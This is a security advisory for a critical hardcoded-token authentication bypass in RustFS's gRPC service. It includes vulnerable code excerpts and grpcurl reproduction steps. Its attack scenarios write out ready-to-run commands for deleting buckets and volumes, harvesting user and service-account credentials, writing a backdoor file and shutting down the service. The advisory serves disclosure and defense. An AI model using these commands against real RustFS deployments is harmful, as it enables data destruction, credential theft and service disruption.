PT-2025-54706 · Crates.Io · Rustfs

Published

2025-12-30

·

Updated

2025-12-30

CVSS v3.1

9.8

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Vulnerability Overview

Description

RustFS implements gRPC authentication using a hardcoded static token "rustfs rpc" that is:
  1. Publicly exposed in the source code repository
  2. Hardcoded on both client and server sides
  3. Non-configurable with no mechanism for token rotation
  4. Universally valid across all RustFS deployments
Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes.

CVSS 3.1 Score

Score: 9.8 (Critical) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Attack Vector (AV): Network - Exploitable remotely
  • Attack Complexity (AC): Low - No special conditions required
  • Privileges Required (PR): None - No authentication needed (bypassed)
  • User Interaction (UI): None - Fully automated exploitation
  • Scope (S): Unchanged - Impact contained to vulnerable component
  • Confidentiality (C): High - Complete data disclosure
  • Integrity (I): High - Complete data modification capability
  • Availability (A): High - Complete service disruption capability

Vulnerable Code Analysis

Server-Side Authentication (rustfs/src/server/http.rs:679-686)

rust
#[allow(clippy::result large err)]
fn check auth(req: Request<()>) -> std::result::Result<Request<()>, Status> {
  let token: MetadataValue< > = "rustfs rpc".parse().unwrap(); // ⚠️ HARDCODED!

  match req.metadata().get("authorization") {
    Some(t) if token == t => Ok(req),
     => Err(Status::unauthenticated("No valid auth token")),
  }
}
Issues:
  • Static token hardcoded as string literal
  • No configuration mechanism (environment variable, file, etc.)
  • Token visible in public GitHub repository
  • Identical across all installations

Client-Side Authentication (crates/protos/src/lib.rs:153-174)

rust
pub async fn node service time out client(
  addr: &String,
) -> Result<NodeServiceClient<...>, Box<dyn Error>> {
  let token: MetadataValue< > = "rustfs rpc".parse()?; // ⚠️ SAME HARDCODED TOKEN!

  // ...

  Ok(NodeServiceClient::with interceptor(
    channel,
    Box::new(move |mut req: Request<()>| {
      req.metadata mut().insert("authorization", token.clone());
      Ok(req)
    }),
  ))
}
Issues:
  • Client uses identical hardcoded token
  • No secure token distribution mechanism
  • Token cannot be rotated without code changes

Service Integration (rustfs/src/server/http.rs:520-521)

rust
let rpc service = NodeServiceServer::with interceptor(make server(), check auth);
let service = hybrid(s3 service, rpc service);
The check auth interceptor is applied to all gRPC services via NodeServiceServer::with interceptor, protecting all 50+ gRPC methods in node.proto with the same weak authentication.

Reproduction Steps

Environment Setup

Test Environment:
  • RustFS Server: localhost:9000 (HTTP + gRPC hybrid service)
  • RustFS Console: localhost:9001
  • Container: rustfs/rustfs:latest (Docker Compose deployment)
  • Default credentials: rustfsadmin/rustfsadmin
Tools Required:
  • grpcurl v1.9.3+ (gRPC command-line client)
  • RustFS proto files: crates/protos/src/node.proto

Step 1: Verify Authentication is Enforced

Test 1.1: Request without authentication token
bash
$ grpcurl -plaintext 
  -import-path /private/tmp/rustfs/crates/protos/src 
  -proto node.proto 
  -d '{}' 
  localhost:9000 node service.NodeService/Ping
Expected Result: ✅ Authentication failure
ERROR:
 Code: Unauthenticated
 Message: No valid auth token
Test 1.2: Request with incorrect token
bash
$ grpcurl -plaintext 
  -H 'authorization: wrong-token-12345' 
  -import-path /private/tmp/rustfs/crates/protos/src 
  -proto node.proto 
  -d '{}' 
  localhost:9000 node service.NodeService/Ping
Expected Result: ✅ Authentication failure
ERROR:
 Code: Unauthenticated
 Message: No valid auth token
Conclusion: Authentication is properly enforced - unauthorized requests are rejected.

Step 2: Extract Hardcoded Token from Source Code

Public Source Code Analysis:
bash
$ git clone https://github.com/rustfs/rustfs.git
$ cd rustfs
$ grep -rn '"rustfs rpc"' --include='*.rs'
Result: ✅ Token found in public source code
rustfs/src/server/http.rs:680:  let token: MetadataValue< > = "rustfs rpc".parse().unwrap();
crates/protos/src/lib.rs:153:  let token: MetadataValue< > = "rustfs rpc".parse()?;
Extracted Token: rustfs rpc

Step 3: Exploit - Authenticate Using Hardcoded Token

Test 3.1: Successful authentication with hardcoded token
bash
$ grpcurl -plaintext 
  -H 'authorization: rustfs rpc' 
  -import-path /private/tmp/rustfs/crates/protos/src 
  -proto node.proto 
  -d '{}' 
  localhost:9000 node service.NodeService/Ping
Result: 🔓 AUTHENTICATION BYPASSED
json
{
 "version": "1",
 "body": "DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA=="
}
Analysis: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed.

Step 4: Demonstrate Access to Sensitive Management APIs

Test 4.1: Server Configuration Disclosure
bash
$ grpcurl -plaintext 
  -H 'authorization: rustfs rpc' 
  -import-path /private/tmp/rustfs/crates/protos/src 
  -proto node.proto 
  -d '{}' 
  localhost:9000 node service.NodeService/ServerInfo
Result: ✅ Complete server configuration disclosed
json
{
 "success": true,
 "serverProperties": "n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA="
}
Analysis:
  • Server returned complete configuration including storage paths, endpoint addresses, version info
  • Binary data contains sensitive internal state (MessagePack encoded)
  • Information disclosure confirmed
Test 4.2: Disk Information Access
bash
$ grpcurl -plaintext 
  -H 'authorization: rustfs rpc' 
  -import-path /private/tmp/rustfs/crates/protos/src 
  -proto node.proto 
  -d '{}' 
  localhost:9000 node service.NodeService/DiskInfo
Result: ✅ Authenticated request accepted (business logic error returned, not auth error)
json
{
 "error": {
  "code": 36,
  "errorInfo": "io error can not find disk"
 }
}
Analysis:
  • Request passed authentication (error is business logic, not authentication)
  • Proves attacker has authenticated access to sensitive system information APIs

Impact Analysis

Affected APIs

All 50+ gRPC methods in node service.NodeService are vulnerable:

🔴 CRITICAL Impact - Data Destruction

  • DeleteBucket - Delete production buckets
  • DeleteVolume - Destroy entire storage volumes
  • DeleteUser - Remove legitimate users
  • DeletePolicy - Remove access control policies
  • DeleteServiceAccount - Remove service accounts

🔴 CRITICAL Impact - Configuration Manipulation

  • ReloadSiteReplicationConfig - Corrupt cluster replication
  • SignalService - Control service lifecycle
  • LoadPolicy - Modify access control policies
  • LoadPolicyMapping - Alter policy assignments

🟠 HIGH Impact - Unauthorized Data Access/Modification

  • ReadAll / ReadAt - Read arbitrary data
  • WriteAll / WriteStream - Inject malicious data
  • RenameFile / RenameData - Manipulate file system
  • UpdateMetadata / WriteMetadata - Corrupt metadata

🟠 HIGH Impact - Privilege Escalation

  • LoadUser - Access user credentials
  • LoadServiceAccount - Access service credentials
  • LoadGroup - Access group memberships

🟡 MEDIUM Impact - Information Disclosure

  • ServerInfo - Server configuration disclosure
  • DiskInfo - Storage configuration disclosure
  • GetMetrics - Performance metrics disclosure
  • GetBucketStats - Bucket statistics disclosure
  • LocalStorageInfo - Storage system information
  • ListBucket - Bucket enumeration

🟡 MEDIUM Impact - Cluster Operations

  • MakeBucket - Unauthorized bucket creation
  • HealBucket - Trigger repair operations
  • BackgroundHealStatus - Monitor internal operations

Attack Scenarios

Scenario 1: Data Destruction

bash
# Enumerate all buckets
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{"options": "{}"}' 
 localhost:9000 node service.NodeService/ListBucket

# Delete critical production bucket
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{"bucket": "production-data"}' 
 localhost:9000 node service.NodeService/DeleteBucket

# Delete entire storage volume
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{"volume": "vol1"}' 
 localhost:9000 node service.NodeService/DeleteVolume
Impact: Complete data loss, business disruption

Scenario 2: Credential Harvesting

bash
# Extract user credentials
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{"access key": "admin"}' 
 localhost:9000 node service.NodeService/LoadUser

# Extract service account credentials
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{"access key": "service-account"}' 
 localhost:9000 node service.NodeService/LoadServiceAccount

# Exfiltrate IAM policies
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{"name": "admin-policy"}' 
 localhost:9000 node service.NodeService/LoadPolicy
Impact: Complete IAM compromise, lateral movement

Scenario 3: Backdoor Installation

bash
# Inject malicious data into system paths
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{"volume": "config", "path": "backdoor.sh", "buf": "..."}' 
 localhost:9000 node service.NodeService/WriteAll

# Modify system configuration
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{"bucket": "system", "path": ".rustfs.sys/config.json", "fi": "..."}' 
 localhost:9000 node service.NodeService/WriteMetadata
Impact: Persistent compromise, further exploitation

Scenario 4: Cluster Disruption

bash
# Corrupt replication configuration
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{}' 
 localhost:9000 node service.NodeService/ReloadSiteReplicationConfig

# Force service restart/shutdown
grpcurl -plaintext -H 'authorization: rustfs rpc' 
 -d '{"sig": 2}' 
 localhost:9000 node service.NodeService/SignalService
Impact: Distributed system failure, data inconsistency

Exploitation Preconditions

Required Conditions

All conditions typically met in production deployments:
  1. Network Access: Attacker can reach gRPC port (9000/TCP)
  • RustFS binds to 0.0.0.0 by default (all interfaces)
  • Commonly exposed for distributed node communication
  1. Token Knowledge: Token is publicly known
  • Available in public GitHub repository
  • Identical across all RustFS installations
  • Cannot be changed without code modification
  1. No Additional Security Controls:
  • No mTLS/certificate-based authentication
  • No IP whitelisting (typically)
  • No VPN/network segmentation requirements
  • No rate limiting on authentication attempts

Attack Complexity

Complexity: 🟢 TRIVIAL
  • Single grpcurl command with hardcoded token
  • No exploit development required
  • No timing or race conditions
  • No target-specific reconnaissance needed
  • Fully automatable
  • Works against any RustFS instance
Time to Exploit: < 1 minute

Security Impact

Confidentiality Impact: HIGH

  • Complete Data Disclosure: All stored objects readable via ReadAll/ReadAt
  • Credential Exposure: IAM users, service accounts, policies accessible
  • Configuration Disclosure: Server, storage, cluster configuration leaked
  • Metrics Exposure: Performance and usage metrics accessible

Integrity Impact: HIGH

  • Data Modification: Arbitrary data injection via WriteAll/WriteStream
  • Metadata Corruption: File metadata tampering via WriteMetadata
  • Policy Manipulation: IAM policies modifiable via LoadPolicy
  • Configuration Changes: Cluster replication config alterable

Availability Impact: HIGH

  • Data Destruction: Buckets/volumes deletable via DeleteBucket/DeleteVolume
  • Service Disruption: Service controllable via SignalService
  • Cluster Degradation: Replication corruption via ReloadSiteReplicationConfig
  • Resource Exhaustion: Arbitrary data writes, bucket creation

Compliance & Regulatory Impact

Standards Violated

PCI-DSS v4.0

  • Requirement 6.5.3: Broken authentication
  • Requirement 8.2: Strong authentication required
  • Requirement 8.6: Multi-factor authentication required

OWASP Top 10 2021

  • A07:2021 - Identification and Authentication Failures
  • Use of hard-coded credentials
  • Missing or ineffective authentication

CWE (Common Weakness Enumeration)

  • CWE-798: Use of Hard-coded Credentials (Rank: 37/400)
  • CWE-1391: Use of Weak Credentials
  • CWE-287: Improper Authentication

NIST Cybersecurity Framework

  • PR.AC-1: Access control mechanisms violated
  • PR.AC-7: Authentication mechanisms insufficient

SOC 2 Type II

  • CC6.1: Logical access controls inadequate
  • CC6.6: Credential management controls missing

Legal & Business Impact

  • Data Breach Notification: GDPR Art. 33, CCPA §1798.150
  • Regulatory Fines: GDPR up to €20M or 4% annual revenue
  • Customer Trust: Severe reputational damage
  • Service Disruption: SLA violations, customer compensation
  • Incident Response Costs: Forensics, remediation, legal fees

Proof of Concept

Automated POC Script

File: audit analysis/poc cve 2025 008 grpc token working.sh
Usage:
bash
chmod +x poc cve 2025 008 grpc token working.sh
./poc cve 2025 008 grpc token working.sh [target host:port]
Default Target: localhost:9000

POC Features

  1. Baseline Authentication Testing
  • Verifies unauthenticated requests are rejected
  • Verifies incorrect tokens are rejected
  1. Exploit Demonstration
  • Authenticates using hardcoded token
  • Calls Ping service successfully
  1. Sensitive API Access
  • Accesses ServerInfo (configuration disclosure)
  • Accesses DiskInfo (system information)
  • Demonstrates authenticated access to management APIs
  1. Detailed Reporting
  • Displays vulnerable code locations
  • Lists all affected APIs (50+ methods)
  • Provides CVSS scoring and impact analysis
  • Includes remediation recommendations

POC Output Summary

[PHASE 1] Baseline Testing
 ✓ Without token: REJECTED (Unauthenticated)
 ✓ With wrong token: REJECTED (Unauthenticated)

[PHASE 2] Exploit
 ✓ With hardcoded token "rustfs rpc": ACCEPTED ✅

[PHASE 3] Sensitive API Access
 ✓ ServerInfo: SUCCESS - Configuration disclosed
 ✓ DiskInfo: SUCCESS - System information accessible

[RESULT] VULNERABILITY CONFIRMED

Acknowledgements

We would like to thank bilisheep from the Xmirror Security Team for discovering and responsibly reporting this vulnerability.

Fix

Using Hardcoded Credentials

Improper Authentication

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-798CWE-287

Related Identifiers

GHSA-H956-RH7X-PPGJ

Affected Products

Rustfs